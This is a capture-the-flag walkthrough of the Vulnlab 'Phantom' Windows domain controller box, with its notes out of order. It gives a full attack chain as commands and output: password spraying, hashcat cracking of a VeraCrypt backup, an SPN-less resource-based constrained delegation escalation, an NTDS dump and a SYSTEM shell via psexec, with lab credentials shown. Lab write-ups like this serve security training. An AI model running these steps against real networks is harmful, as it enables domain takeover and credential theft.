Here is my notes on PHANTOM box from Vulnlab which deployed to Hackthebox.
PHANTOM: 10.10.99.223
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
-Nothing Interesting for BloodHound Data on ibryant user.
Resource-based constrained (RBCD) SPN-LESS:
BloodHound Data on svc_sspr:
SVC_SSPR -> ForceChangePassword -> RNICHOLS && WSILVA && CROSE
All of these three users are AddAllowedToAct -> DC.PHANTOM.VL
#We are going to pick WSILVA:
net rpc password "WSILVA" 'Admin123!' -U phantom.vl/svc_sspr%gB6XTcqVP5MlP7Rc -S phantom.vl
impacket-rbcd -delegate-from 'wsilva' -delegate-to 'DC$' -dc-ip '10.10.99.223' -action 'write' 'phantom.vl'/'wsilva':'Admin123!'
getTGT.py -hashes :$(pypykatz crypto nt 'Admin123!') 'phantom.vl'/'wsilva'
export KRB5CCNAME='wsilva.ccache'
describeTicket.py 'wsilva.ccache' | grep 'Ticket Session Key'
[*] Ticket Session Key : 168335580e1be67575150eefcffb6469
changepasswd.py -newhashes :168335580e1be67575150eefcffb6469 'phantom.vl'/'wsilva':'Admin123!'@'phantom.vl'
getST.py -k -no-pass -u2u -impersonate "Administrator" -spn "cifs/DC.phantom.vl" 'phantom.vl'/'wsilva'
getST.py -k -no-pass -u2u -impersonate "Administrator" -spn "host/DC.phantom.vl" 'phantom.vl'/'wsilva'
export KRB5CCNAME=Administrator@cifs_DC.phantom.vl@PHANTOM.VL.ccache
crackmapexec smb dc.phantom.vl --use-kcache --ntds
sudo rlwrap psexec.py dc.phantom.vl -k
┌──(root㉿kali)-[/home/kali/VL/PHANTOM/10.10.99.223]
└─# sudo rlwrap psexec.py dc.phantom.vl -k
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on dc.phantom.vl.....
[*] Found writable share ADMIN$
[*] Uploading file OymjUhBG.exe
[*] Opening SVCManager on dc.phantom.vl.....
[*] Creating service jvaz on dc.phantom.vl.....
[*] Starting service jvaz.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2527]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
DC
SYSTEM-SHELL !
https://medium.com/@bericontraster/phantom-vulnlab-full-walkthrough-tjnull-list-23dcf429a287
https://medium.com/@arz101/vulnlab-phantom-3c4b4da492d9
C:\Users\Administrator\Desktop> whoami
nt authority\system
C:\Users\Administrator\Desktop> hostname
DC
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is BAA2-45C4
Directory of C:\Users\Administrator\Desktop
07/06/2024 10:55 AM <DIR> .
07/06/2024 10:55 AM <DIR> ..
07/04/2024 06:22 AM 2,308 Microsoft Edge.lnk
07/06/2024 10:57 AM 36 root.txt
2 File(s) 2,344 bytes
2 Dir(s) 8,436,060,160 bytes free
C:\Users\Administrator\Desktop> type root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-15 16:09:40Z)
-NO ASREPROASTING. - NOPE !
-NO KERBEROASTING. - NOPE !
135/tcp open msrpc Microsoft Windows RPC
┌──(root㉿kali)-[/home/kali/VL/PHANTOM/10.10.99.223]
└─# rpcclient 10.10.99.223 -U "guest%guest" -c "enumdomusers;quit"
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
┌──(root㉿kali)-[/home/kali/VL/PHANTOM/10.10.99.223]
└─# rpcclient 10.10.99.223 -U "" -c "enumdomusers;quit"
Password for [WORKGROUP\]:
result was NT_STATUS_ACCESS_DENIED
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: phantom.vl0., Site: Default-First-Site-Name)
-Account Required otherwise DON'T BOTHER !
phantom.vl\ibryant:Ph4nt0m@5t4rt!
ldapsearch -H ldap://10.10.99.223 -x -W -D "ibryant@phantom.vl" -b "dc=phantom,dc=vl" '(objectClass=person)' > ldap-people
-Nothing Interesting like No Password Disclosure and Interesting Description.
-ibryant is a member of IT GROUP.
445/tcp open microsoft-ds?
┌──(root㉿kali)-[/home/kali/VL/PHANTOM/10.10.99.223]
└─# smbmap -u "Guest" -p "" -P 445 -H 10.10.99.223
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.99.223:445 Name: 10.10.99.223 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Departments Share NO ACCESS
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
Public READ ONLY
SYSVOL NO ACCESS Logon server share
[*] Closed 1 connections
sudo lookupsid.py Guest@10.10.99.223 | tee usernames
grep SidTypeUser usernames | awk '{print $2}' | cut -d "\\" -f2 > users.txt
┌──(root㉿kali)-[/home/kali/VL/PHANTOM/10.10.99.223]
└─# smbclient \\\\10.10.99.223\\Public -U ""
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Jul 11 11:03:14 2024
.. DHS 0 Sun Jul 7 04:39:30 2024
tech_support_email.eml A 14565 Sat Jul 6 12:08:43 2024 #Interesting.
6127103 blocks of size 4096. 1206699 blocks available
smb: \> get tech_support_email.eml
getting file \tech_support_email.eml of size 14565 as tech_support_email.eml (25.1 KiloBytes/sec) (average 25.1 KiloBytes/sec)
smb: \> exit
┌──(root㉿kali)-[/home/kali/VL/PHANTOM/10.10.99.223]
└─# ls
nmap nmapAutomator_10.10.99.223_All.txt recon tech_support_email.eml usernames users.txt
tech_support_email.eml:
Content-Type: multipart/mixed; boundary="===============6932979162079994354=="
MIME-Version: 1.0
From: alucas@phantom.vl
To: techsupport@phantom.vl
Date: Sat, 06 Jul 2024 12:02:39 -0000
Subject: New Welcome Email Template for New Employees
--===============6932979162079994354==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Dear Tech Support Team,
I have finished the new welcome email template for onboarding new employees.
Please find attached the example template. Kindly start using this template for all new employees.
Best regards,
Anthony Lucas
--===============6932979162079994354==
Content-Type: application/pdf
MIME-Version: 1.0
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="welcome_template.pdf"
JVBERi0xLjcKJcOkw7zDtsOfCjIgMCBvYmoKPDwvTGVuZ3RoIDMgMCBSL0ZpbHRlci9GbGF0ZURl
Y29kZT4+CnN0cmVhbQp4nI1Vy4rcMBC8+yt0zsFTXZYsGcyAJY8hgT0sGcgh5LBksyE5LGRYyO+H
bnsfM7OeyckvSdVV1dVGLe5vtRkOT78e7r4/uXxTqj8ODjWYXCtSd1Fc7Obr4Uf15YN7rHY3pdp8
[SNIP]
[Base64 ENCODED]
Take that base64 encoded and decoded into a pdf then turn it into a text file afterwards:
┌──(root㉿kali)-[/home/kali/VL/PHANTOM/10.10.99.223]
└─# base64 -d tech_support_email.eml > output.pdf
┌──(root㉿kali)-[/home/kali/VL/PHANTOM/10.10.99.223]
└─# pdftotext output.pdf > output.txt
┌──(root㉿kali)-[/home/kali/VL/PHANTOM/10.10.99.223]
└─# cat output.txt
Welcome to Phantom!
Dear <NAME>
We are excited to have you on board.
Below are your user credentials:
Username: <USERNAME>
Password: Ph4nt0m@5t4rt!
Please log in to your account using these credentials. For security reasons, we strongly
recommend that you change your password immediately after your first login.
If you have any questions or need assistance, feel free to reach out to our support team at
techsupport@phantom.vl
Best regards,
The Phantom Team
Password: Ph4nt0m@5t4rt!
Users Cred Spray with this password as usual:
┌──(root㉿kali)-[/home/kali/VL/PHANTOM/10.10.99.223]
└─# crackmapexec smb 10.10.99.223 -u users.txt -p 'Ph4nt0m@5t4rt!' --continue-on-success | grep "[+]"
SMB 10.10.99.223 445 DC [+] phantom.vl\ibryant:Ph4nt0m@5t4rt!
Got the creds !
phantom.vl\ibryant:Ph4nt0m@5t4rt!
┌──(root㉿kali)-[/home/kali/VL/PHANTOM/10.10.99.223]
└─# crackmapexec smb 10.10.99.223 -u ibryant -p 'Ph4nt0m@5t4rt!' --shares
SMB 10.10.99.223 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
SMB 10.10.99.223 445 DC [+] phantom.vl\ibryant:Ph4nt0m@5t4rt!
SMB 10.10.99.223 445 DC [+] Enumerated shares
SMB 10.10.99.223 445 DC Share Permissions Remark
SMB 10.10.99.223 445 DC ----- ----------- ------
SMB 10.10.99.223 445 DC ADMIN$ Remote Admin
SMB 10.10.99.223 445 DC C$ Default share
SMB 10.10.99.223 445 DC Departments Share READ #Interesting.
SMB 10.10.99.223 445 DC IPC$ READ Remote IPC
SMB 10.10.99.223 445 DC NETLOGON READ Logon server share
SMB 10.10.99.223 445 DC Public READ
SMB 10.10.99.223 445 DC SYSVOL READ Logon server share #No Groups or Registry.xml and any other interesting xml file.
# cd Backup
# ls
drw-rw-rw- 0 Sat Jul 6 14:04:34 2024 .
drw-rw-rw- 0 Thu Jul 11 10:59:02 2024 ..
-rw-rw-rw- 12582912 Sat Jul 6 14:04:34 2024 IT_BACKUP_201123.hc
# get IT_BACKUP_201123.hc
# exit
┌──(root㉿kali)-[/home/…/VL/PHANTOM/10.10.99.223/Department]
└─# ls
Finance HR IT IT_BACKUP_201123.hc
Veracrypt Hash Cracking Example: #PHANTOM-VL
└─$ cat phantom.txt
phantom
Phantom
PHANTOM
PHANT0M
phant0m
phantom.vl
PHANTOM.VL
phant0m.vl
PHANT0M.vl
Ph4nt0m
PH4NT0M
└─$ cat phantom.rule
$2 $0 $2 $3 $$
$2 $0 $2 $3 $&
$2 $0 $2 $3 $@
$2 $0 $2 $3 $!
$2 $0 $2 $3 $#
$2 $0 $2 $3 $%
$2 $0 $2 $3 $^
$2 $0 $2 $3 $*
$2 $0 $2 $3 $(
$2 $0 $2 $3 $)
$2 $0 $2 $3 $-
$2 $0 $2 $3 $_
$2 $0 $2 $3 $=
$2 $0 $2 $3 $+
#This essentially states that each string will be appended by the year 2023 along with each special character on a regular keyboard (or at least most of them).
hashcat -a 0 -m 13721 IT_BACKUP_201123.hc phantom.txt -r phantom.rule
IT_BACKUP_201123.hc:Phantom2023!
How to install Veracrypt on Kali Linux
cd ~/Downloads
wget https://launchpad.net/veracrypt/trunk/1.25.9/+download/veracrypt-1.25.9-setup.tar.bz2
tar -xvf veracrypt-1.25.9-setup.tar.bz2
./veracrypt-1.25.9-setup-gui-x64
tar -xf vyos_backup.tar.gz
config/config.boot - Interesting file !
[SNIP]
vpn {
sstp {
authentication {
local-users {
username lstanley {
password "gB6XTcqVP5MlP7Rc"
}
}
mode "local"
}
client-ip-pool SSTP-POOL {
range "10.0.0.2-10.0.0.100"
[SNIP]
Users Creds Spraying with gB6XTcqVP5MlP7Rc password as usual.
┌──(root㉿kali)-[/home/kali/VL/PHANTOM/10.10.99.223]
└─# crackmapexec smb 10.10.99.223 -u users.txt -p 'gB6XTcqVP5MlP7Rc' | grep '[+]'
SMB 10.10.99.223 445 DC [+] phantom.vl\svc_sspr:gB6XTcqVP5MlP7Rc
phantom.vl\svc_sspr:gB6XTcqVP5MlP7Rc
#Credential Discovered !
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: phantom.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.phantom.vl
| Not valid before: 2024-07-05T19:49:21
|_Not valid after: 2025-01-04T19:49:21
| rdp-ntlm-info:
| Target_Name: PHANTOM
| NetBIOS_Domain_Name: PHANTOM
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: phantom.vl
| DNS_Computer_Name: DC.phantom.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-11-15T16:09:48+00:00
|_ssl-date: 2024-11-15T16:10:28+00:00; -2s from scanner time.
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
crackmapexec winrm 10.10.99.223 -u svc_sspr -p 'gB6XTcqVP5MlP7Rc'
SMB 10.10.99.223 5985 DC [*] Windows 10.0 Build 20348 (name:DC) (domain:phantom.vl)
HTTP 10.10.99.223 5985 DC [*] http://10.10.99.223:5985/wsman
WINRM 10.10.99.223 5985 DC [+] phantom.vl\svc_sspr:gB6XTcqVP5MlP7Rc (Pwn3d!)
evil-winrm -i 10.10.99.223 -u svc_sspr -p 'gB6XTcqVP5MlP7Rc'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_sspr\Documents> whoami
phantom\svc_sspr
*Evil-WinRM* PS C:\Users\svc_sspr\Documents> hostname
DC
#USER-SHELL !
*Evil-WinRM* PS C:\Users\svc_sspr\Desktop> whoami
phantom\svc_sspr
*Evil-WinRM* PS C:\Users\svc_sspr\Desktop> hostname
DC
*Evil-WinRM* PS C:\Users\svc_sspr\Desktop> dir
Directory: C:\Users\svc_sspr\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/6/2024 11:58 AM 74 user.txt
*Evil-WinRM* PS C:\Users\svc_sspr\Desktop> type user.txt
VL{REDIRECTED}
USER.TXT: VL{REDIRECTED}
PRIV ESC:
#FROM BloodHound-Data.
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49672/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49673/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
49713/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows